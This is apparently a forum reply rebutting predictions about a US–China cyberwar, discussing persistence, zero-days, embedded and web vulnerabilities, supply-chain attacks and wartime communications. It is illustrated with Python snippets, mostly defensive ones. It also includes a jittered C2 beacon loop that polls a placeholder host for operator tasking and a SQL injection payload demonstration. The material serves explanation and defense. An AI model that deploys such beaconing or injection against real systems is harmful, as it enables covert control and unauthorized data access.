For every hack we hear about there are many hacks we don’t hear about. When you break into an adversary’s computer network, the first thing you want to do is establish persistence. Most of those hacks we don’t hear about probably establish persistence. I would be surprised if China and the United States hadn’t established persistence in most of each other’s critical systems.
You may have misspoken, but this sounds confused. If you’re just attempting to accomplish one thing and don’t intend to come back to use their systems again, persistence strictly makes you easier to detect, because it involves planting some kind of C2/agent software, generating new creds/tickets, or placing some intentional vulnerability that someone at the organization may eventually stumble upon. It’s only if you’re planning on exploiting the same thing over and over that it’s safer and cheaper to establish persistence. Planting stealthy persistence in really “core” systems that are part of an intranet and aren’t directly connected to the web is actually a bit of an engineering challenge, although I would say it’s one that favors attackers, especially nation-state attackers or no-lifers who can develop their own tooling.
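To make the detectability point concrete: every persistence mechanism has to live somewhere enumerable, which is exactly what defenders sweep for. A minimal sketch of such a sweep in Python (Linux-only; these paths are just the well-known spots, and a real EDR covers far more):

```python
import glob
import os

# Common Linux persistence locations a defender (or EDR) will sweep.
# Illustrative only; a real sweep also covers kernel modules, bootloaders,
# PAM, SSH authorized_keys, LD_PRELOAD hooks, etc.
PERSISTENCE_GLOBS = [
    "/etc/cron.d/*",
    "/etc/cron.*/*",                     # cron.daily, cron.hourly, ...
    "/var/spool/cron/crontabs/*",
    "/etc/systemd/system/*.service",
    "/etc/rc.local",
    os.path.expanduser("~/.config/autostart/*.desktop"),
    os.path.expanduser("~/.bashrc"),
]

def sweep():
    for pattern in PERSISTENCE_GLOBS:
        for path in glob.glob(pattern):
            st = os.stat(path)
            # Recently modified entries in these locations are exactly the
            # kind of artifact that gets an implant noticed.
            print(f"{st.st_mtime:.0f}  {path}")

if __name__ == "__main__":
    sweep()
```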
In the event of a hot war between the United States and China, both sides will burn most of their zero-days immediately to cause as much disruption to the enemy as possible. It takes a lot of work to clean a hacker out of one of your systems. The cyber onslaught will probably overwhelm both sides’ ability to reset their software. They will have to focus on the most critical systems of all: communications.
It’s really hard to predict things about cybersecurity 30+ years into the future, but this is probably anachronistic. Just over the last 5-10 years, zero-day vulnerabilities for popular platforms like Windows, Linux, Android, and iOS have been monotonically increasing in complexity and cost to build. In recent years especially, the response by big vendors like Apple to new zero days, whether developed by security researchers or found in the wild, has been pretty serious. Broad mitigations and defense in depth have turned a one-genius, 3-month problem into a five-genius, 6-month problem. In thirty years, assuming we aren’t using completely different computing platforms, making traditional zero-click 0days will be virtually impossible.
At least for now I am worried about:
Traditional “assume breach” models of security that protect things like corporate AD environments. Malware & C2 developers have always been ahead of defensive solutions in this arena, and I can’t see any reason that will stop being the case in the future (see the beacon sketch after this list).
The proliferation of critical embedded systems that, for performance reasons, won’t have the same memory protections that larger devices are getting (see the hardening check after this list). Router & “IoT” RCEs have stayed at roughly the same ~$10k price for nearly fifteen years because anybody with decent systems understanding and a >135 IQ can make one in a few weeks.
Application-specific web vulnerabilities. So far the web has been an almost perpetual minefield of new classes of bugs, to the point where I no longer think it’s reasonable to expect most web developers to have a good understanding of all of them (see the injection example after this list). And web interfaces are being put on nearly every system of importance, so nearly everything is becoming vulnerable.
The rise of watering-hole and supply-chain attacks that amplify all of the above by infecting important downstream libraries, ubiquitous system software, etc. (see the hash-pinning sketch after this list).
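On the “assume breach”/C2 point: the reason beacon traffic stays ahead of defenses is that it can be shaped to look like ordinary client telemetry. A toy sketch of the jittered-HTTPS pattern that commodity C2 frameworks use (Python with `requests`; the URL is hypothetical):

```python
import random
import time

import requests

# Hypothetical endpoint; real C2 hides behind legitimate-looking domains
# or compromised infrastructure.
C2_URL = "https://cdn.example.com/telemetry"

def beacon():
    while True:
        try:
            # Looks like routine telemetry: a small HTTPS POST with a
            # browser-ish User-Agent, indistinguishable from app analytics.
            resp = requests.post(
                C2_URL,
                json={"v": 2},
                headers={"User-Agent": "Mozilla/5.0"},
                timeout=10,
            )
            tasking = resp.json()   # operator's queued commands, if any
        except requests.RequestException:
            tasking = None          # fail quietly; noise gets you caught
        # Randomized sleep ("jitter") defeats naive periodic-beacon detection.
        time.sleep(random.uniform(300, 900))
```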
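On the embedded point, the protection gap is mechanically checkable. A sketch using `pyelftools` (assuming it’s installed) that tests a firmware ELF for NX and PIE, the two mitigations router binaries most often ship without:

```python
import sys

from elftools.elf.constants import P_FLAGS
from elftools.elf.elffile import ELFFile

def check_hardening(path):
    with open(path, "rb") as f:
        elf = ELFFile(f)
        # PIE: position-independent executables have type ET_DYN.
        pie = elf.header["e_type"] == "ET_DYN"
        # NX: no PT_GNU_STACK segment at all usually means an executable stack.
        nx = False
        for seg in elf.iter_segments():
            if seg["p_type"] == "PT_GNU_STACK":
                nx = not (seg["p_flags"] & P_FLAGS.PF_X)
        print(f"{path}: NX={'yes' if nx else 'NO'}  PIE={'yes' if pie else 'NO'}")

if __name__ == "__main__":
    check_hardening(sys.argv[1])
```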
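On the web point, the trouble is that the fixes are per-query, per-application discipline rather than a platform mitigation. The oldest class of the bunch, sketched with Python’s built-in sqlite3, shows the shape that newer classes (SSRF, prototype pollution, request smuggling) keep repeating:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

def lookup_vulnerable(name):
    # String-building the query: classic SQL injection.
    return conn.execute(
        f"SELECT role FROM users WHERE name = '{name}'"
    ).fetchall()

def lookup_safe(name):
    # Parameterized query: the driver keeps data out of the SQL grammar.
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)
    ).fetchall()

print(lookup_vulnerable("' OR '1'='1"))  # [('admin',)] -- injected
print(lookup_safe("' OR '1'='1"))        # [] -- treated as a literal name
```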
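And on the watering-hole point, the minimal countermeasure is pinning exactly what you pull. A stdlib-only sketch of verifying a downloaded artifact against a known digest (the URL and hash are placeholders):

```python
import hashlib
import sys
import urllib.request

# Placeholder values -- pin the real URL and the digest you actually audited.
ARTIFACT_URL = "https://example.com/libfoo-1.2.3.tar.gz"
EXPECTED_SHA256 = "0" * 64

def fetch_verified(url, expected_sha256):
    data = urllib.request.urlopen(url).read()
    digest = hashlib.sha256(data).hexdigest()
    if digest != expected_sha256:
        # A compromised upstream serves different bytes; refuse to use them.
        sys.exit(f"hash mismatch for {url}: got {digest}")
    return data
```

pip’s `--require-hashes` mode is the same idea applied to a whole dependency tree.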
The interesting thing about these techniques, though, is that they look a lot less like “nuclear” 0days, developed by a John von Neumann type and usable to break into anything, than like “conventional” attacks. In the outbreak of a conventional war where both sides are directly targeting the civilian infrastructure, cell towers, etc. of large technologically advanced nations, this makes the battle a lot more numbers-heavy than I think either side is anticipating. The situation right now is a little like if we had invented fighter jets after nuclear bombs; sometimes I imagine larger nation-states might have developed TOPGUN-style A-teams to use sparingly but seen little point in training large cadres of F-35 pilots as a precaution for a hot war, because they’ve never known a hot war against a peer adversary while the tech existed. I think the military is making a serious mistake in not training reserves of B-tier computer hackers for a situation like this, where we’re just trying to sabotage & protect as much as we can. If neither side figures this out, I would expect lots of low-value targets to go untouched, at least at the start of the war.
I expect all but the most secure systems (think “US president’s personal phone”) will be entirely compromised. However, there are many ways to communicate. Both sides can improvise. Since secondary channels abound, it might be better just to spy on enemy communications instead of breaking them.
To be clear, even if they literally took out the internet, the U.S. and China could still use specialized devices with theorem-prover-assisted verified firmware to transmit & receive AES-encrypted numbers over radio, WW2-style. Semi-“proven-safe” code already exists for some much more complicated weapon systems in planes and helicopters, and I expect that a lot of it is actually secure. Those communication platforms will probably be the simplest information systems for a competent military to keep safe from hackers in a wartime environment.
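For concreteness on the “AES numbers over radio” idea: the payload side is tiny and uses nothing exotic. A sketch with the `cryptography` package, assuming a pre-shared 256-bit key and using AES-GCM so tampering is detectable, that emits hex groups you could literally read over voice radio:

```python
import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

KEY = os.urandom(32)   # in practice: a pre-shared key, distributed offline

def encode_for_radio(plaintext: bytes, key: bytes) -> str:
    nonce = os.urandom(12)                  # never reuse a nonce with GCM
    ct = AESGCM(key).encrypt(nonce, plaintext, None)
    blob = (nonce + ct).hex().upper()
    # Four-character groups, like classic numbers-station traffic.
    return " ".join(blob[i:i + 4] for i in range(0, len(blob), 4))

def decode_from_radio(groups: str, key: bytes) -> bytes:
    blob = bytes.fromhex(groups.replace(" ", ""))
    nonce, ct = blob[:12], blob[12:]
    # Raises InvalidTag if the ciphertext was garbled or tampered with.
    return AESGCM(key).decrypt(nonce, ct, None)

msg = encode_for_radio(b"GRID 38S MB 12345 67890", KEY)
print(msg)
print(decode_from_radio(msg, KEY))
```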